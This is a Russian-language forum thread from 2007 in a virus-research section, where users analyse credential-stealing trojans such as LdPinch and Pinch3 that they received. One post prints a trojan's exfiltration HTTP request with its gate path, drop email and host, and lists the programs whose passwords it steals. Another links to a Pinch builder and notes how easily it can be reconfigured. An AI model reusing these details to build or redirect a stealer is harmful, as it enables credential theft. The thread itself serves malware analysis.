Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых) |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 47 . 48 . >> |
Посл.ответ | Сообщение |
|
Создано: 13 октября 2006 23:15 · Поправил: Модератор · Личное сообщение · #1 |
|
Создано: 11 января 2007 09:29 · Личное сообщение · #2 |
|
Создано: 11 января 2007 09:31 · Личное сообщение · #3 |
|
Создано: 11 января 2007 11:49 · Поправил: Crawler · Личное сообщение · #4 Spirit_Fenix пишет: самое интересное, что на маил.ру стоит антивирус, но все равно пропускает Антивирус мыла г*вно. Юзать надо не антивири, а сандбокс, файрвол и мозги. Как вообще можно запускать какую-та малопонятную программу от неизвестного адресата? Тайна. Кстати, а есть какой-нибудь краклабовский фтпшник, например? ----- Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей. |
|
Создано: 11 января 2007 12:00 · Личное сообщение · #5 |
|
Создано: 12 января 2007 02:48 · Личное сообщение · #6 Crawler я-то не запускал.. я знаю, что там лежит обычно) но еще встречаются люди, которые запускают файлы, пришедшие из совершенно неизвестных мест. Nightshade Одному знакомому прислали Trojan-PSW.Win32.LdPinch.bad, могу переслать, если надо.. Кстати (сразу извиняюсь за тупой вопрос), как бы узнать, на какое мыло отсылает данные, выше указанный троян? |
|
Создано: 12 января 2007 04:29 · Личное сообщение · #7 |
|
Создано: 12 января 2007 04:31 · Личное сообщение · #8 |
|
Создано: 12 января 2007 08:19 · Личное сообщение · #9 |
|
Создано: 12 января 2007 09:39 · Поправил: WoLFeR · Личное сообщение · #10 |
|
Создано: 12 января 2007 09:48 · Личное сообщение · #11 |
|
Создано: 12 января 2007 13:56 · Поправил: apple · Личное сообщение · #12 Вообщем тот вирь создает файлы ie-hook.txt, hook.txt и pass.bin, тырит что-то с ICQ (именно аськи от Mirabilis), аутглюка, тоталкоммандера, инеткома, осла, какого-то RimArts, CuteFTP, диалапа, Оперы, по-моему какого-то неизвестного мне ftp-сервера(клиента?), Мозиллы, Эудоры, Тундербёрда, МайлРу агента, Миранды, R&Q, &RQ, TheBat, логины от плагина Far hosts, Триллиана, qaim, qip, FileZilla, Mozilla Firefox, Punto Switcher (?!), SmartFTP, Passport.NET, USDownloader, Детекта ВМ нет. Отправляет 'POST /reports/gate.php HTTP/1.0',0Dh,0Ah,'Host: %s',0Dh,0Ah,'%s-Type: application/x-www-form-urlencoded',0Dh,0Ah,'%s-Length: %u',0Dh,0Ah,0Dh,0Ah,'a=uniqload@topmail.kz&b=Rep&d=%s&c=',0 Где HOST - bakayar0.info Есть похоже что-то зашифрованное NXjFJfTiSUXqrxkPQrGiv Хранился троянчик у автора в H:SPloitcsrss.exe Блин, хочу конфигуратор!!! (если есть) да и строку расшифровать/перешифровать не лишне, если это хост ----- ring 0 |
|
Создано: 12 января 2007 14:08 · Поправил: Red Bar0n · Личное сообщение · #13 есть конфигуратор склееный с троем но расклееть трой и поменять этим же конфигуратором мыла вопрос 5 минут ; dобще это берецо любой скампилиный пинч 2.98 или какой там последний... и меняецо мыло но функционал не прибавляецо от этого : все что было в трое то и остаецо ибо при кампеляции билда те строки были закаментены. называецо та хрень pinch3 от Васьки... hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял. пароли уходят kat00x@gmail.com через smtp.inbox.ru :\ |
|
Создано: 12 января 2007 16:37 · Личное сообщение · #14 хех вот еще один "пенч3" проспамили по ойсикю 201763668 (02:26:12 13/01/2007) Запрос авторизации Porno s ZHana Friski toka u nas!!!! Zaydite syuda: hxxp://slil.ru/23734215 отчеты падают на www.sudga.org/agate/gate.php много всего пытаецо спереть а также обойти касперчега и аутпост через нажатие на кнопке упакован "прЕватным криптором" бугого 14 секций с произвольными именами... распаковываецо на раз =// |
|
Создано: 13 января 2007 00:00 · Личное сообщение · #15 Red Bar0n пишет: uniqload@topmail.kz Гы... казахи взялись за компы! apple пишет: Punto Switcher (?!) А это блин очень меня насторожило! Так если у пинтосвитчера включена функция дневника, то он является тем же кейлоггером. и дневник паролится. Хорошо если он тырит тока пароль, а если и сам фаел дневника? йоп!!!! 2 Red Bar0n: Так всётаки интересно! Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ? Или это чьято собственная разработка? неуж казахи научились делать? Гы... ----- AutoIt |
|
Создано: 13 января 2007 04:11 · Поправил: Freecod · Личное сообщение · #16 Удивительно неужели ещё есть люди, запускающие файлы с расширением .exe от неизвесных людей? Впрочем, читать спам иногда интересно, мне вот прислал письмо SADIQ HASSAN, расказывает, что он дружбан покойного Саддама, и тот завещял забрать со своего счёта 30 лимонов баксов, но вот беда, надо перегнать бабки на другой счёт, что бы их снять. Не помогу ли я доблесным бойцам с американской тиранией за 35%, от меня всего-то надо - номер счёта и NAME ADDRESS TEL/FAX…..MOBILE LINE OCCUPATION ORGANISATION DATE OF BIRTH COUNTRY PRIVATE EMAIL ADDRESS Счастье ! Бегу отправлять реквизиты на мыльник в домене 4-го уровня sadiq@hassandiq.orangehome.co.uk PS Обратите внимание на домен - без украины не обошлось ))) |
|
Создано: 13 января 2007 05:59 · Личное сообщение · #17 |
|
Создано: 13 января 2007 06:45 · Личное сообщение · #18 |
|
Создано: 13 января 2007 07:10 · Личное сообщение · #19 |
|
Создано: 13 января 2007 09:50 · Личное сообщение · #20 OLEGator пишет: Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ? Или это чьято собственная разработка? неуж казахи научились делать? это баяный пинч от дамрая так как тянет пароли для qip сталобыть версия старше 2.58 =\ казахи нехрена не научились делать походу только покупают билды и криптуют их =\ |
|
Создано: 13 января 2007 12:21 · Личное сообщение · #21 (off) OLEGator пишет: неуж казахи научились делать? Гыгы. Я одно время там жил, там не только казахи живут (/off) Red Bar0n пишет: hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял. пароли уходят kat00x@gmail.com через smtp.inbox.ru : А не вломить ли сцуке флудоспамом ? ----- Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей. |
|
Создано: 13 января 2007 14:15 · Поправил: Error_Log · Личное сообщение · #22 Столько шума вокруг пустоты. Другое дело, если бы поймал кто-то какого-то интересного трояна... а так не пойму, что там казахи (или не казахи, не важно) научились делать. ИМХО нифига они не научились. Когда аверы поймали Backdoor.Rustok.B они удивлялись куда больше >Among Rustock's distinguishing characteristics are its heavy reliance on advanced rootkit technologies to hide from security software and its changeling-like ability to morph itself each time it infects a file. >Hide itself from applications: RootkitRevealer BlackLight Rkdetector gmer.exe endoscope.EXE DarkSpy Anti-Rootkit ... Даже статью написали: Rustock Trojan A Model For Future Threats http://www.informationweek.com/story/showArticle.jhtml?articleID=196603916&cid=RSSfeed_IWK_News ----- Research is my purpose |
|
Создано: 13 января 2007 17:42 · Поправил: S_T_A_S_ · Личное сообщение · #23 |
|
Создано: 14 января 2007 22:57 · Личное сообщение · #24 |
|
Создано: 14 января 2007 23:19 · Личное сообщение · #25 |
|
Создано: 15 января 2007 06:57 · Личное сообщение · #26 Из статьи: "It's a true polymorphic," Martin says Гыгы. Кого они хотели этим удивить [ОФФ] Freecod пишет: PS Обратите внимание на домен - без украины не обошлось ))) Гыгы. Только сейчас заметил и ржалпацтулом 3 часа. [/ОФФ] Error_Log пишет: Ratinsh пишет: UnHackMe ver. 4.0.4.257 фигня это а не антируткит мдя. Это не руткит, а покет новобранца-извращенца. ----- Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей. |
|
Создано: 19 января 2007 18:21 · Личное сообщение · #27 |
|
Создано: 20 января 2007 08:05 · Поправил: OLEGator · Личное сообщение · #28 А я наверное опять чёта подцепил... Сегодня утром из моей ацки какаято сволочь вылазила и клянчала денег у моего другана. Но благо, я предпологал, что это может случиться и контакт лист храню только локально! На серваке пусто! И в итоге нарушитель мог обуть только тех, кто сам к нему постучался первым. Блин.... надо завязывать с рыбалкой... Столько мусора летит... з.ы. только что подсказали что возможно это оно: hxxp://im.avtoban.com/ типа прога для асикью протокола всякие фичи... ----- AutoIt |
|
Создано: 22 января 2007 14:11 · Личное сообщение · #29 Мне только что пришло пустое (никакого текста внутри) сообщение непонятно от кого. И какой-то непонятный файл внутри. Не стал его открывать. ОТ: Mccarthy Anthony <mrrdz@movie.fr> ТЕМА: Hugging My Pillow RFC: Return-path: <mrrdz@movie.fr> Received: from [75.167.28.57] (port=3636 helo=75-167-28-57.phnx.qwest.net) by mx31.mail.ru with esmtp id 1H95Ca-000EW8-00 Народ, посмотрите, что это за вирус. У меня Norton Antivirus молчит... cbf8_22.01.2007_CRACKLAB.rU.tgz - greeting card.exe |
|
Создано: 22 января 2007 14:19 · Личное сообщение · #30 Mavlyudov ну сть же www.virustotal.com/en/indexx.html :\ вот что выдал плаген к фф (онлайн чек дрвеба) Размер файла: 46739 байт cbf8_22.01.2007_CRACKLAB.rU.tgz - archive GZIP >cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz - archive TAR В файле >>cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz/greeting card.exe обнаружен вирус Trojan.DownLoader.17767 |
|
Создано: 23 января 2007 05:41 · Личное сообщение · #31 Mavlyudov Тут и думать даже не надо =) Вирусня 100%. Так как нахрена ХЗ кому слать открытку в EXE формате и к тому же ничего не написав. Хотя из 100 человек 10 дебилов запустят ради любопытства P.S. Многим походу дела прислали Так как и мне тоже приходило (письмо грохнул даже не задумываясь). ----- Computer Security Laboratory |
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 47 . 48 . >> |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
Эта тема закрыта. Ответы больше не принимаются. |